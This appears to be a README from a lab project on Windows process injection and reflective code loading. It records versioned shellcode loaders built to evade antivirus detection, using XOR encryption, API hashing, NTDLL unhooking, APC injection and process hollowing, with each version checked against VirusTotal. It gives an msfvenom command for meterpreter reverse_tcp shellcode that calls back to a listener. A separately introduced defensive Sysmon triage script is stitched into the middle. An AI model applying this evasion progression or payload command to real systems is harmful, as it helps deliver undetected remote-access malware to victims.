
IC3-512/Process-Injection-and-Reflective-Code-Loading


Process-Injection-and-Reflective-Code-Loading

Setup

Install Vagrant, then bring the box up and provision it:

source .venv/bin/activate
vagrant up --no-provision

ansible-playbook -i inventory.ini ansible/main.yml -c winrm

Saferwall

Github link

vagrantbox is locked :/ --> SSH is set to key-based, but without the key provided 🤡

vagrant up

building the vagrant box itself in build/vagrant also doesn't work :/

Creating shellcode

No Sliver payloads --> because they are very big (> 10 MB)

PS C:\Users\vagrant> wmic OS get OSArchitecture
OSArchitecture
64-bit

PS C:\Users\vagrant> Get-Process | Where-Object { $_.Name -eq "explorer" } | Select-Object Name, Id, @{Name="Architecture";Expression={if ($_.Path -match "SysWOW64") {"x86"} else {"x64"}}}

Name       Id Architecture
----       -- ------------
explorer 1200 x64
msfvenom --payload windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=9001 --format c

ThreatCheck: https://github.com/rasta-mouse/ThreatCheck.git

Get the .NET Framework developer pack

https://dotnet.microsoft.com/en-us/download/dotnet-framework/thank-you/net48-developer-pack-offline-installer

Scans

VirusTotal, https://kleenscan.com/index

0.0.3 (xor + CreateProcessA + WriteProcessMemory + SetThreadContext + ResumeThread)

Working :D VirusTotal: Virustotal 0.0.3 (Address Import Table)

0.0.4 (Improved xor + CreateProcessA + WriteProcessMemory + SetThreadContext + ResumeThread)

Virustotal: Virustotal 0.0.4

0.0.6 (Improved encryptor)

Virustotal: Virustotal 0.0.6

0.1.0 (API Hashing)

https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware

VirusTotal: Virustotal 0.1.0 (Address Import Table)

0.2.0 (Unhook NTDLL)

Virustotal: Virustotal 0.2.0

0.2.1 (apply API Hashing to all)

Virustotal: Virustotal 0.2.1

0.3.0 (APC Injection)

Virustotal: Virustotal 0.3.0

https://unprotect.it/technique/apc-injection/

0.4.0 (Early bird APC injection)

Virustotal: Virustotal 0.4.0

0.5.0 (Process Hollowing)

Virustotal: Virustotal v0.5.0

Source:

Iredteam
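A defender-side companion to the version log above, added here and not part of this repository: given Sysmon Event ID 10 (ProcessAccess) records, it decodes the GrantedAccess mask into the PROCESS_* rights and reports which of the injection APIs the versions above rely on (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread) a cross-process handle could serve. The event lines are constructed samples, and the required-rights table follows the Win32 documentation for each call.

```python
import re

# PROCESS_* access rights from winnt.h, as they appear in the GrantedAccess
# mask of a Sysmon Event ID 10 (ProcessAccess) record.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400

# Rights each injection API from the version log needs on the target process
# handle, per the Win32 documentation of the respective call.
API_REQUIREMENTS = {
    "VirtualAllocEx": PROCESS_VM_OPERATION,
    "WriteProcessMemory": PROCESS_VM_OPERATION | PROCESS_VM_WRITE,
    "CreateRemoteThread": PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION
    | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION,
}

# Constructed sample records in the field layout of Sysmon Event ID 10.
SAMPLE_EVENTS = [
    "SourceImage: C:\\Windows\\System32\\Taskmgr.exe TargetImage: C:\\Windows\\explorer.exe GrantedAccess: 0x1000",
    "SourceImage: C:\\Users\\vagrant\\ConsoleApplication1.exe TargetImage: C:\\Windows\\explorer.exe GrantedAccess: 0x43A",
    "SourceImage: C:\\Windows\\explorer.exe TargetImage: C:\\Windows\\explorer.exe GrantedAccess: 0x1FFFFF",
]

EVENT_RE = re.compile(r"SourceImage: (\S+) TargetImage: (\S+) GrantedAccess: (0x[0-9A-Fa-f]+)")

def implied_apis(mask):
    """Injection APIs whose required rights are all present in the mask."""
    return [api for api, need in API_REQUIREMENTS.items() if mask & need == need]

def triage(lines):
    """(source, target, mask, apis) for every cross-process handle that could
    back a WriteProcessMemory call, the write step shared by all chains above."""
    hits = []
    for line in lines:
        m = EVENT_RE.search(line)
        if not m:
            continue  # not a ProcessAccess record, nothing to decode
        source, target, mask = m.group(1), m.group(2), int(m.group(3), 16)
        if source.lower() == target.lower():
            continue  # a process opening itself is not remote injection
        apis = implied_apis(mask)
        if "WriteProcessMemory" in apis:
            hits.append((source, target, mask, apis))
    return hits

print(triage(SAMPLE_EVENTS))  # run over the constructed sample records
```

Only the second sample is reported: the first handle carries query rights only, and the third is a process opening itself.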

Reflective Code Loading

0.0.1 (Simple VirtualAlloc + memcpy + CreateThread)

Defender flagged (static)

C:\Users\vagrant\Downloads\ThreatCheck\ThreatCheck\bin\Release>ThreatCheck.exe -f C:\Users\vagrant\source\repos\ConsoleApplication1\x64\Debug\ConsoleApplication1.exe
[+] Target file size: 62464 bytes
[+] Analyzing...
[!] Identified end of bad bytes at offset 0xAF9D

--> the shellcode itself gets flagged. VirusTotal: Virustotal 0.0.1

0.0.2 (Simple VirtualAlloc + memcpy + CreateThread + xor encryption)

Defender flagged (runtime)

C:\Users\vagrant\Downloads\ThreatCheck\ThreatCheck\bin\Release>ThreatCheck.exe -f C:\Users\vagrant\source\repos\ConsoleApplication1\x64\Debug\ConsoleApplication1.exe
[+] No threat found!

Virustotal: Virustotal 0.0.2

0.0.5 (ConvertThreadToFiber + VirtualAlloc + VirtualProtect + SwitchToFiber)

Virustotal: Virustotal 0.0.5

Sources
